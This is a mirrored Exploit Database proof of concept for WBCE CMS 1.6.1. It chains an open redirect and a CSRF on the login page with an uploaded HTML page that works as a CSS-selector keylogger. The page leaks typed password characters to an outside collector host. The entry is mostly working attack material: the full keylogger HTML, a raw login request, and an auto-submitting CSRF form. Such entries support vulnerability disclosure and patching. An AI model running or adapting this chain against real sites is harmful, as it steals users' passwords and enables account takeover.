WBCE CMS 1.6.1 – Open Redirect & CSRF

• Exploit Database
• 37 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-07-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51566/

• Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
  Version: 1.6.1
  Bugs:Open Redirect + CSRF = CSS KEYLOGGING
  Technology: PHP
  Vendor URL: https://wbce-cms.org/
  Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
  Date of found: 03-07-2023
  Author: Mirabbas Ağalarov
  Tested on: Linux 
  
  
  2. Technical Details & POC
  ========================================
  
  1. Login to Account
  2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
  3. Then you upload html file .(html file content is as below)
  
  '''
  <html>
  <head>
  <title>
  Login
  </title>
  <style>
  input[type="password"][value*="q"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/q');}
  input[type="password"][value*="w"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/w');}
  input[type="password"][value*="e"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/e');}
  input[type="password"][value*="r"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/r');}
  input[type="password"][value*="t"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/t');}
  input[type="password"][value*="y"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/y');}
  input[type="password"][value*="u"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/u');}
  input[type="password"][value*="i"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/i');}
  input[type="password"][value*="o"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/o');}
  input[type="password"][value*="p"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/p');}
  input[type="password"][value*="a"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/a');}
  input[type="password"][value*="s"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/s');}
  input[type="password"][value*="d"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/d');}
  input[type="password"][value*="f"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/f');}
  input[type="password"][value*="g"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/g');}
  input[type="password"][value*="h"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/h');}
  input[type="password"][value*="j"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/j');}
  input[type="password"][value*="k"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/k');}
  input[type="password"][value*="l"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/l');}
  input[type="password"][value*="z"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/z');}
  input[type="password"][value*="x"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/x');}
  input[type="password"][value*="c"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/c');}
  input[type="password"][value*="v"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/v');}
  input[type="password"][value*="b"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/b');}
  input[type="password"][value*="n"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/n');}
  input[type="password"][value*="m"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/m');}
  input[type="password"][value*="Q"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
  input[type="password"][value*="W"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/W');}
  input[type="password"][value*="E"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/E');}
  input[type="password"][value*="R"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/R');}
  input[type="password"][value*="T"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/T');}
  input[type="password"][value*="Y"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
  input[type="password"][value*="U"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/U');}
  input[type="password"][value*="I"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/I');}
  input[type="password"][value*="O"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/O');}
  input[type="password"][value*="P"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/P');}
  input[type="password"][value*="A"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/A');}
  input[type="password"][value*="S"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/S');}
  input[type="password"][value*="D"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/D');}
  input[type="password"][value*="F"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/F');}
  input[type="password"][value*="G"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/G');}
  input[type="password"][value*="H"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/H');}
  input[type="password"][value*="J"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/J');}
  input[type="password"][value*="K"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/K');}
  input[type="password"][value*="L"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/L');}
  input[type="password"][value*="Z"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
  input[type="password"][value*="X"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/X');}
  input[type="password"][value*="C"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/C');}
  input[type="password"][value*="V"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/V');}
  input[type="password"][value*="B"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/B');}
  input[type="password"][value*="N"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/N');}
  input[type="password"][value*="M"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/M');}
  input[type="password"][value*="1"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/1');}
  input[type="password"][value*="2"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/2');}
  input[type="password"][value*="3"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/3');}
  input[type="password"][value*="4"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/4');}
  input[type="password"][value*="5"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/5');}
  input[type="password"][value*="6"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/6');}
  input[type="password"][value*="7"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/7');}
  input[type="password"][value*="8"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/8');}
  input[type="password"][value*="9"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/9');}
  input[type="password"][value*="0"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/0');}
  input[type="password"][value*="-"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/-');}
  input[type="password"][value*="."]{
  background-image: url('https://enflownwx6she.x.pipedream.net/.');}
  input[type="password"][value*="_"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
  input[type="password"][value*="@"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
  input[type="password"][value*="?"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
  input[type="password"][value*=">"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
  input[type="password"][value*="<"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
  input[type="password"][value*="="]{
  background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
  input[type="password"][value*=":"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
  input[type="password"][value*=";"]{
  background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
  </style>
  </head>
  <body>
  <label>Please enter username and password</label>
  <br><br>
  Password:: <input type="password" />
  <script>
  document.querySelector('input').addEventListener('keyup', (evt)=>{
  evt.target.setAttribute('value', evt.target.value);
  })
   </script>
  </body>
  </html>
  '''
  
  4.Then go to url of html file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy url.
  5.Then you logout account and go to again login page (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php)
  
  
  POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
  Host: localhost
  Content-Length: 160
  Cache-Control: max-age=0
  sec-ch-ua: 
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: ""
  Upgrade-Insecure-Requests: 1
  Origin: http://localhost
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
  Connection: close
  
  url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login
   
  6.If write as (https://ATTACKER.com) in url parameter on abowe request onyou redirect to attacker.com.
  7.We write to html files url
  
  url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html
  
  8.And create csrf-poc with csrf.poc.generator
  
  <html>
  <title>
  This CSRF was found by miri
  </title>
  <body>
  <h1>
  CSRF POC
  </h1>
  <form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
  <input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
  </form>
  <script>document.forms[0].submit();</script>
  </body>
  </html>
  
  
  9.If victim click , ht redirect to html file and this page send to my server all keyboard activity of victim.
  
  
  Poc video : https://youtu.be/m-x_rYXTP9E